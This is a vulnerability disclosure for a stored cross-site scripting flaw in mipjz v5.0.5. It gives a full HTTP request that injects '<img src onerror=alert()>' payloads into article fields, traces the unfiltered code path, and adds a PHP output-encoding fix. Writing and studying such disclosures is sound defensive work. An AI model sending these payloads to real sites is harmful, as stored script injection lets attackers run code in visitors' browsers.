A cross-site scripting (XSS) vulnerability exists in mipjz v5.0.5
[Vulnerability Description] A Cross Site Scripting (XSS) vulnerability exists in mipjz v5.0.5; attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] https://github.com/sansanyun/mipjz http://www.mipjz.com/
[Affected Product Code Base] v5.0.5
[Vulnerability Proof]
- Add an article, insert js code in the description parameter: xss
```
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 426
Connection: close
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss<img src onerror=alert(1)>","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
```
- Visit the article page, the code is loaded and executed
[Code Details]
- When an article is added, the parameters are received and passed to \app\article\model\Articles.php:itemAdd for processing
- \app\article\model\Articles.php:itemAdd does not check or filter the description, and stores it directly in the database
- Article details: \app\article\controller\ArticleDetail.php:index takes the article description from the database and passes it to $mipDescription without filtering
- In the "guess you like" area of the article display template \template\default\article\articleDetail.html, the $mipDescription from the previous step is output directly, causing the malicious code to be executed
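
The store-then-render flow described under [Code Details], next to a hardened form, as an added example that is not code from mipjz or from this report. The helper names `normalizeDescription` and `e` are hypothetical, the sample value is the description string from the request above, and the mbstring extension is assumed to be available.

```php
<?php
// Added example: hypothetical helpers, not code from the mipjz code base.

/**
 * Input side: the description is a plain-text field, so normalise it
 * before storage. Defence in depth only; output encoding is the real fix.
 */
function normalizeDescription(string $raw, int $maxLen = 255): string
{
    $text = strip_tags($raw);                          // drop markup such as <img ...>
    $text = preg_replace('/\s+/u', ' ', $text) ?? '';  // null (invalid UTF-8) becomes ''
    return mb_substr(trim($text), 0, $maxLen, 'UTF-8');
}

/**
 * Output side: encode for an HTML text node or a quoted attribute value.
 * Also neutralises rows that were stored before any input check existed.
 */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample: the "description" value from the request in this report,
// standing in for what the detail controller reads back from the database.
$stored = 'xss<img src onerror=alert(22)>';

// Pattern described in the report: the stored value reaches the page unencoded,
// so the browser parses it as markup.
$vulnerable = '<p class="desc">' . $stored . '</p>';

// Hardened: encode at the point of output, in both text and attribute context.
$hardenedText = '<p class="desc">' . e($stored) . '</p>';
$hardenedMeta = '<meta name="description" content="' . e($stored) . '">';

echo $vulnerable, "\n";
echo $hardenedText, "\n";
echo $hardenedMeta, "\n";

// What would be written to the database if the input check were also applied.
echo normalizeDescription($stored), "\n";
```

The same output encoding applies to the `tags` value and the `fieldList` `name` value that carry markup in the request above, wherever those are rendered.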
What level of authentication does this require?